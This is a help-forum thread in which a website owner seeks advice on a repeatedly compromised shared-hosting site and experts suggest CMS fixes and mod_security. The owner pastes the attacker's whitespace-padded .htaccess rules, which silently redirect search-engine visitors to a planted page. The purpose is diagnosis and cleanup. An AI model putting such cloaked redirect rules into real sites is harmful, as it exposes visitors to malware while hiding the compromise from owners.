Website infected with virus - keeps coming back

Hi,

A contact needs some assistance with a website. It just keeps getting infected with a virus.
The website is:


www.philcampbellmusic.co.uk

(WARNING virus at time of writing on aboe website which will be brough down in the next few hours and reset - make sure you have anti virus software on your PC before clickling link above)

Whenever we clean it up they soon seem to reinfect it with a virus again. We even took down the administrattion for the CMS that allowed us to edit the content and of cours tried changing various passwords.

The website is hosted by fasthosts (linux package - mysql db). Is there some weakness in their system which could be making this worse / easier for the culprits to gain access?

Thanks
afflik1923Asked:
Who is Participating?
 
afflik1923Connect With a Mentor Author Commented:
Still ok since fixing last attack but I'm sure an attack is imminent. I will close this tad for now however.

Thanks
0
 
fosiul01Connect With a Mentor Commented:
HI,
if the website hosted on linux, then i would not say surely that its been affected by virus

it could be , someone upload some script on the server via your cms or your server has been compromized

can you just explain, whats make you thinks its been effected by virus ??

did any one tell you ??

also is this shared hosting or vps hosting??
0
 
afflik1923Author Commented:
if you visit the website running anti virus software and Internet explorer (say try it with AVG) then you will see what occurs. In fact I have attached a screen shot.

Also if you google Phil Campbell and then click the first result, you are actually redirected to another website.

I can fix it in the short term, but how can I stop this from re-occuring?


ExampleCapture.JPG
0
Worried about phishing attacks?

90% of attacks start with a phish. It’s critical that IT admins and MSSPs have the right security in place to protect their end users from these phishing attacks. Check out our latest feature brief for tips and tricks to keep your employees off a hackers line!

 
fosiul01Connect With a Mentor Commented:
Ok from my pc, i am getting Troj/JSRedir-D for script call .js

if you look at the picture you will see
its taking /admin/inages/check.js as virus

its thinking js script as virus

like one of my webiste, i had a simple javascrpt, and those antivirus would not allow to view that page because of javascript


cleaning virus on the pc would not make any different, and also, there is no virus on the server, its the script you need to check, there is somehing on the script that its not allowed by antivirus

virusscript.GIF
0
 
afflik1923Author Commented:
It is a script virus but that's the problem. It actually tries to compromise with vistiors PC. Fasthosts even closed us down for not sorting it out for a period of time.
Also the problem at esent does not occur in firefox. Only IE and the flash does not play properly.

0
 
fosiul01Connect With a Mentor Commented:
its the CMS you are using, I would of say the Bugs in that CMS,

do you have any check.js file in /admin/imagesehi/check.js  file ??
0
 
xmachineCommented:
Hi,

Can you rename both files and upload them here please ?



A Symantec Certified Specialist @ your service
0
 
afflik1923Author Commented:
I will upload them ASAP. they are always the files that get changed and they are full of someone else's code.

Unfortunltaty the original creators of the website have washed their hands of the website a bit which is frustrating.

Thanks.
0
 
afflik1923Author Commented:
I'm stugling to upload the two infected files right now. But please find the contents of the .htaccess file (in code box)
It uses  a lot of empty space so when you first open it it looks like an empty.

Also I now have written instructions on how I fix the problem. But it is always not long before it comes back. The guide is:

1) Deleted the ehi folder in
/htdocs/admin/images/

2) Replaced the two files
flashEmbed.js
pageSwitch.js
With non infected versions.

3) Open for editing and deleted all the content in the .htaccess file in the root folder.

If I run these three steps the website is back to normal. But how do I find and close whatever hole is letting whoever in?




      # a0b4df006e02184c60dbf503e71c87ad                                                                                                                                                      
                                                                                                                                                      RewriteEngine On                                                                                                                                                      
                                                                                                                                                      RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\. [NC]                                                                                                                                                      
                                                                                                                                                      RewriteCond %{HTTP_REFERER}  [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=                                                                                                                                                      
                                                                                                                                                      RewriteCond %{HTTP_REFERER} ![?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=[^&]+(%3A|%22)                                                                                                                                                      
                                                                                                                                                      RewriteCond %{TIME_SEC} <59                                                                                                                                                      
                                                                                                                                                      RewriteRule ^.*$ /admin/images/ehi/ex3/t.htm [L]                                                                                                                                                      
                                                                                                                                                      # a995d2cc661fa72452472e9554b5520c                               

Open in new window

0
 
afflik1923Author Commented:
So any ideas on this? At present virus not present as cleaned it up again but I know sooner or later it will rear its head again. Be nice to close whatever hole is open.

Thanks
0
 
xmachineConnect With a Mentor Commented:
Additional Countermeasures:

Please check the following articles for additional countermeasures:

http://25yearsofprogramming.com/blog/20071223.htm

http://25yearsofprogramming.com/blog/20070705.htm

http://thedesignspace.net/MT2archives/000505.html

Check your website for any infected pages:

http://www.unmaskparasites.com/


To secure your website(s), it's recommended to install Apache Mod_security:

http://www.modsecurity.org/projects/modsecurity/apache/index.html

http://www.onlamp.com/pub/a/apache/2003/11/26/mod_security.html

http://www.howtoforge.com/apache_mod_security

http://www.linuxjournal.com/article/8708


A Symantec Certified Specialist @ your service
0
 
afflik1923Author Commented:
I will check out some of these links but also add that don't forget I'm using a shared host so I doubt I would be able to make changes to the Apache installaion?
Do you think the webhost themselves (Fasthost) play some part in the weak security?
0
 
xmachineConnect With a Mentor Commented:
Hi,

Yes, you should ask them on how to add/enable mod_security for apache. Otherwise, change the hosting provider. If they can't protect, it's the time for an upgrade.

Check the following providers + guides:

http://litespeedtech.com/solutions/webhosting/

http://blog.eukhost.com/webhosting/how-to-install-mod_security-for-apache/

http://www.sharkspace.com/helpcenter/index.php?_m=knowledgebase&_a=viewarticle&kbarticleid=88&nav=0,22


A Symantec Certified Specialist @ your service
0
 
afflik1923Author Commented:
note I thought I had still awarded points for this question but if this has not happened let me know. but I beleive I have awarded points and acceptedown summary answer.

Thanks
0
Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.

All Courses

From novice to tech pro — start learning today.